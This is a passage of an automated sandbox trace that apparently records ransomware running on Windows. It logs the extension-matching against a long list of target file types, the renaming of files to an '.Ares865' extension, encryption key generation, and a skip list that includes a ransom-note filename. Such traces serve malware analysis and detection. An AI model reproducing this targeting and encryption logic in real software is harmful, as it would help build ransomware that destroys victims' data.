[0063.435] lstrlenW (lpString="pnz") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.435] lstrlenW (lpString="qry") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.435] lstrlenW (lpString="qvd") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.435] lstrlenW (lpString="rbf") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.435] lstrlenW (lpString="rctd") returned 4 [0063.435] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.435] lstrlenW (lpString="rod") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.435] lstrlenW (lpString="rodx") returned 4 [0063.435] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.435] lstrlenW (lpString="rpd") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.436] lstrlenW (lpString="rsd") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.436] lstrlenW (lpString="sas7bdat") returned 8 [0063.436] lstrcmpiW (lpString1="rden.jpg", lpString2="sas7bdat") returned -1 [0063.436] lstrlenW (lpString="sbf") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.436] lstrlenW (lpString="scx") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.436] lstrlenW (lpString="sdb") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.436] lstrlenW (lpString="sdc") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.436] lstrlenW (lpString="sdf") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.436] lstrlenW (lpString="sis") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.436] lstrlenW (lpString="spq") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.436] lstrlenW (lpString="te") returned 2 [0063.436] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.436] lstrlenW (lpString="teacher") returned 7 [0063.436] lstrcmpiW (lpString1="den.jpg", lpString2="teacher") returned -1 [0063.436] lstrlenW (lpString="tmd") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.436] lstrlenW (lpString="tps") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.436] lstrlenW (lpString="trc") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.436] lstrlenW (lpString="trc") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.436] lstrlenW (lpString="trm") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.436] lstrlenW (lpString="udb") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.436] lstrlenW (lpString="udl") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.436] lstrlenW (lpString="usr") returned 3 [0063.436] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.437] lstrlenW (lpString="v12") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.437] lstrlenW (lpString="vis") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.437] lstrlenW (lpString="vpd") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.437] lstrlenW (lpString="vvv") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.437] lstrlenW (lpString="wdb") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.437] lstrlenW (lpString="wmdb") returned 4 [0063.437] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.437] lstrlenW (lpString="wrk") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.437] lstrlenW (lpString="xdb") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.437] lstrlenW (lpString="xld") returned 3 [0063.437] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.437] lstrlenW (lpString="xmlff") returned 5 [0063.437] lstrcmpiW (lpString1="n.jpg", lpString2="xmlff") returned -1 [0063.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865") returned 89 [0063.437] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg.ares865"), dwFlags=0x1) returned 1 [0063.438] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.439] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23871) returned 1 [0063.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.440] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.440] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.440] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6040, lpName=0x0) returned 0x164 [0063.449] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6040) returned 0x190000 [0063.451] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.453] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.453] CloseHandle (hObject=0x164) returned 1 [0063.453] CloseHandle (hObject=0x154) returned 1 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.453] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="GREENB~1.HTM")) returned 1 [0063.453] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.453] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="aoldtz.exe") returned 1 [0063.453] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".") returned 1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="..") returned 1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="windows") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="bootmgr") returned 1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="temp") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="pagefile.sys") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="boot") returned 1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="ids.txt") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="ntuser.dat") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="perflogs") returned -1 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="MSBuild") returned -1 [0063.454] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0063.454] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 81 [0063.454] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Green Bubbles.htm" | out: lpString1="Green Bubbles.htm") returned="Green Bubbles.htm" [0063.454] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0063.454] lstrlenW (lpString="Ares865") returned 7 [0063.454] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0063.454] lstrlenW (lpString=".dll") returned 4 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".dll") returned 1 [0063.454] lstrlenW (lpString=".lnk") returned 4 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".lnk") returned 1 [0063.454] lstrlenW (lpString=".ini") returned 4 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".ini") returned 1 [0063.454] lstrlenW (lpString=".sys") returned 4 [0063.454] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".sys") returned 1 [0063.454] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0063.454] lstrlenW (lpString="bak") returned 3 [0063.454] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.454] lstrlenW (lpString="ba_") returned 3 [0063.454] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.454] lstrlenW (lpString="dbb") returned 3 [0063.454] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.454] lstrlenW (lpString="vmdk") returned 4 [0063.454] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.454] lstrlenW (lpString="rar") returned 3 [0063.454] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.454] lstrlenW (lpString="zip") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.455] lstrlenW (lpString="tgz") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.455] lstrlenW (lpString="vbox") returned 4 [0063.455] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.455] lstrlenW (lpString="vdi") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.455] lstrlenW (lpString="vhd") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.455] lstrlenW (lpString="vhdx") returned 4 [0063.455] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.455] lstrlenW (lpString="avhd") returned 4 [0063.455] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.455] lstrlenW (lpString="db") returned 2 [0063.455] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.455] lstrlenW (lpString="db2") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.455] lstrlenW (lpString="db3") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.455] lstrlenW (lpString="dbf") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.455] lstrlenW (lpString="mdf") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.455] lstrlenW (lpString="mdb") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.455] lstrlenW (lpString="sql") returned 3 [0063.455] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.455] lstrlenW (lpString="sqlite") returned 6 [0063.455] lstrcmpiW (lpString1="es.htm", lpString2="sqlite") returned -1 [0063.455] lstrlenW (lpString="sqlite3") returned 7 [0063.455] lstrcmpiW (lpString1="les.htm", lpString2="sqlite3") returned -1 [0063.455] lstrlenW (lpString="sqlitedb") returned 8 [0063.455] lstrcmpiW (lpString1="bles.htm", lpString2="sqlitedb") returned -1 [0063.456] lstrlenW (lpString="xml") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.456] lstrlenW (lpString="$er") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.456] lstrlenW (lpString="4dd") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.456] lstrlenW (lpString="4dl") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.456] lstrlenW (lpString="^^^") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.456] lstrlenW (lpString="abs") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.456] lstrlenW (lpString="abx") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.456] lstrlenW (lpString="accdb") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.456] lstrlenW (lpString="accdc") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.456] lstrlenW (lpString="accde") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.456] lstrlenW (lpString="accdr") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.456] lstrlenW (lpString="accdt") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.456] lstrlenW (lpString="accdw") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.456] lstrlenW (lpString="accft") returned 5 [0063.456] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.456] lstrlenW (lpString="adb") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.456] lstrlenW (lpString="adb") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.456] lstrlenW (lpString="ade") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.456] lstrlenW (lpString="adf") returned 3 [0063.456] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.456] lstrlenW (lpString="adn") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.457] lstrlenW (lpString="adp") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.457] lstrlenW (lpString="alf") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.457] lstrlenW (lpString="ask") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.457] lstrlenW (lpString="btr") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.457] lstrlenW (lpString="cat") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.457] lstrlenW (lpString="cdb") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.457] lstrlenW (lpString="ckp") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.457] lstrlenW (lpString="cma") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.457] lstrlenW (lpString="cpd") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.457] lstrlenW (lpString="dacpac") returned 6 [0063.457] lstrcmpiW (lpString1="es.htm", lpString2="dacpac") returned 1 [0063.457] lstrlenW (lpString="dad") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.457] lstrlenW (lpString="dadiagrams") returned 10 [0063.457] lstrcmpiW (lpString1="ubbles.htm", lpString2="dadiagrams") returned 1 [0063.457] lstrlenW (lpString="daschema") returned 8 [0063.457] lstrcmpiW (lpString1="bles.htm", lpString2="daschema") returned -1 [0063.457] lstrlenW (lpString="db-journal") returned 10 [0063.457] lstrcmpiW (lpString1="ubbles.htm", lpString2="db-journal") returned 1 [0063.457] lstrlenW (lpString="db-shm") returned 6 [0063.457] lstrcmpiW (lpString1="es.htm", lpString2="db-shm") returned 1 [0063.457] lstrlenW (lpString="db-wal") returned 6 [0063.457] lstrcmpiW (lpString1="es.htm", lpString2="db-wal") returned 1 [0063.457] lstrlenW (lpString="dbc") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.457] lstrlenW (lpString="dbs") returned 3 [0063.457] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.457] lstrlenW (lpString="dbt") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.458] lstrlenW (lpString="dbv") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.458] lstrlenW (lpString="dbx") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.458] lstrlenW (lpString="dcb") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.458] lstrlenW (lpString="dct") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.458] lstrlenW (lpString="dcx") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.458] lstrlenW (lpString="ddl") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.458] lstrlenW (lpString="dlis") returned 4 [0063.458] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.458] lstrlenW (lpString="dp1") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.458] lstrlenW (lpString="dqy") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.458] lstrlenW (lpString="dsk") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.458] lstrlenW (lpString="dsn") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.458] lstrlenW (lpString="dtsx") returned 4 [0063.458] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.458] lstrlenW (lpString="dxl") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.458] lstrlenW (lpString="eco") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.458] lstrlenW (lpString="ecx") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.458] lstrlenW (lpString="edb") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.458] lstrlenW (lpString="epim") returned 4 [0063.458] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.458] lstrlenW (lpString="fcd") returned 3 [0063.458] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.459] lstrlenW (lpString="fdb") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.459] lstrlenW (lpString="fic") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.459] lstrlenW (lpString="flexolibrary") returned 12 [0063.459] lstrcmpiW (lpString1=" Bubbles.htm", lpString2="flexolibrary") returned -1 [0063.459] lstrlenW (lpString="fm5") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.459] lstrlenW (lpString="fmp") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.459] lstrlenW (lpString="fmp12") returned 5 [0063.459] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.459] lstrlenW (lpString="fmpsl") returned 5 [0063.459] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.459] lstrlenW (lpString="fol") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.459] lstrlenW (lpString="fp3") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.459] lstrlenW (lpString="fp4") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.459] lstrlenW (lpString="fp5") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.459] lstrlenW (lpString="fp7") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.459] lstrlenW (lpString="fpt") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.459] lstrlenW (lpString="frm") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.459] lstrlenW (lpString="gdb") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.459] lstrlenW (lpString="gdb") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.459] lstrlenW (lpString="grdb") returned 4 [0063.459] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.459] lstrlenW (lpString="gwi") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.459] lstrlenW (lpString="hdb") returned 3 [0063.459] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.460] lstrlenW (lpString="his") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.460] lstrlenW (lpString="ib") returned 2 [0063.460] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.460] lstrlenW (lpString="idb") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.460] lstrlenW (lpString="ihx") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.460] lstrlenW (lpString="itdb") returned 4 [0063.460] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.460] lstrlenW (lpString="itw") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.460] lstrlenW (lpString="jet") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.460] lstrlenW (lpString="jtx") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.460] lstrlenW (lpString="kdb") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.460] lstrlenW (lpString="kexi") returned 4 [0063.460] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.460] lstrlenW (lpString="kexic") returned 5 [0063.460] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.460] lstrlenW (lpString="kexis") returned 5 [0063.460] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.460] lstrlenW (lpString="lgc") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.460] lstrlenW (lpString="lwx") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.460] lstrlenW (lpString="maf") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.460] lstrlenW (lpString="maq") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.460] lstrlenW (lpString="mar") returned 3 [0063.460] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.460] lstrlenW (lpString="marshal") returned 7 [0063.460] lstrcmpiW (lpString1="les.htm", lpString2="marshal") returned -1 [0063.460] lstrlenW (lpString="mas") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.461] lstrlenW (lpString="mav") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.461] lstrlenW (lpString="maw") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.461] lstrlenW (lpString="mdbhtml") returned 7 [0063.461] lstrcmpiW (lpString1="les.htm", lpString2="mdbhtml") returned -1 [0063.461] lstrlenW (lpString="mdn") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.461] lstrlenW (lpString="mdt") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.461] lstrlenW (lpString="mfd") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.461] lstrlenW (lpString="mpd") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.461] lstrlenW (lpString="mrg") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.461] lstrlenW (lpString="mud") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.461] lstrlenW (lpString="mwb") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.461] lstrlenW (lpString="myd") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.461] lstrlenW (lpString="ndf") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.461] lstrlenW (lpString="nnt") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.461] lstrlenW (lpString="nrmlib") returned 6 [0063.461] lstrcmpiW (lpString1="es.htm", lpString2="nrmlib") returned -1 [0063.461] lstrlenW (lpString="ns2") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.461] lstrlenW (lpString="ns3") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.461] lstrlenW (lpString="ns4") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.461] lstrlenW (lpString="nsf") returned 3 [0063.461] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.461] lstrlenW (lpString="nv") returned 2 [0063.462] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.462] lstrlenW (lpString="nv2") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.462] lstrlenW (lpString="nwdb") returned 4 [0063.462] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.462] lstrlenW (lpString="nyf") returned 3 [0063.462] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.462] lstrlenW (lpString="odb") 